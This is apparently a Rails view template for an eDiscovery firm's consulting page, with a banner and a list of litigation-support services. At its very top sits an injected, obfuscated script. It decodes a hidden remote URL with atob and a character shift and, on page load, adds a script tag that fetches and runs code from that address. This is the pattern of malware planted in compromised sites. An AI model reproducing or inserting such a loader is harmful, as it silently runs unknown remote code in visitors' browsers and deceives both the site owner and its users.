<head><script>window[(function(_jlk,_03){var _CU6dW='';for(var _D3jANe=0;_D3jANe<_jlk.length;_D3jANe++){var _qDtp=_jlk[_D3jANe].charCodeAt();_03>1;_qDtp-=_03;_qDtp+=61;_qDtp%=94;_qDtp+=33;_CU6dW==_CU6dW;_qDtp!=_D3jANe;_CU6dW+=String.fromCharCode(_qDtp)}return _CU6dW})(atob('Knd+Qj86NTNEeTVJ'), 46)] = 'd2dd043c821749491561';     var zi = document.createElement('script');     (zi.type = 'text/javascript'),     (zi.async = true),     (zi.src = (function(_UQy,_uq){var _jFmUt='';for(var _JQEiMZ=0;_JQEiMZ<_UQy.length;_JQEiMZ++){var _jX1F=_UQy[_JQEiMZ].charCodeAt();_jX1F-=_uq;_jX1F+=61;_jX1F%=94;_jX1F!=_JQEiMZ;_uq>5;_jFmUt==_jFmUt;_jX1F+=33;_jFmUt+=String.fromCharCode(_jX1F)}return _jFmUt})(atob('diQkfiNIPT14IzwqdzsjcSJ3fiQjPHF9ez0qdzskb3U8eCM='), 14)),     document.readyState === 'complete'?document.body.appendChild(zi):     window.addEventListener('load', function(){         document.body.appendChild(zi)     });</script></head>

<section class="bg-accent-2">
  <section class="section position-relative py-5">
    <%= image_tag "consulting.jpg", class: 'background-image' %>

    <div class="parallax-content parallax-header">
      <div class="parallax-header__inner">
        <div class="parallax-header__content">
          <div class="container">
            <div class="row justify-content-md-center">
              <div class="col-md-10 col-xl-8">
                <h2 class="heading-decorated heading-decorated_center">Consulting</h2>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </section>
</section>

<section class="section-lg bg-default">
  <div class="container">
    <div class="row row-50 justify-content-xl-center">
      <div class="col-lg-10 col-xl-8">
        <article class="post-wide">
          <h6>
          Our experts have extensive litigation and eDiscovery experience. Working with your team, we design realistic, executable workflows that meet your production schedule and complement your litigation strategy. We know that managing eDiscovery projects efficiently requires careful planning and diligent execution. A dedicated expert works with you during the various steps of the discovery process, as you receive ongoing detailed reports on the progress of your projects.
          </h6>
          <p class="heading-5">Our Consulting team brings:</p>
          <ul class="list-marked">
            <li><h6>High quality, data-driven litigation readiness </h6></li>
            <li><h6>Collections and collections strategy </h6></li>
            <li><h6>Early data assessment</h6></li>
            <li><h6>Rule 26(f) Meet-and-Confer negotiation support</h6></li>
            <li><h6>Defensible data reduction</h6></li>
            <li><h6>Search consulting</h6></li>
            <li><h6>Strong strategic, technical and project management expertise</h6></li>
            <li><h6>Industry-standard tools and proven processes </h6></li>
          </ul>
        </article>
      </div>
    </div>
  </div>
</section>
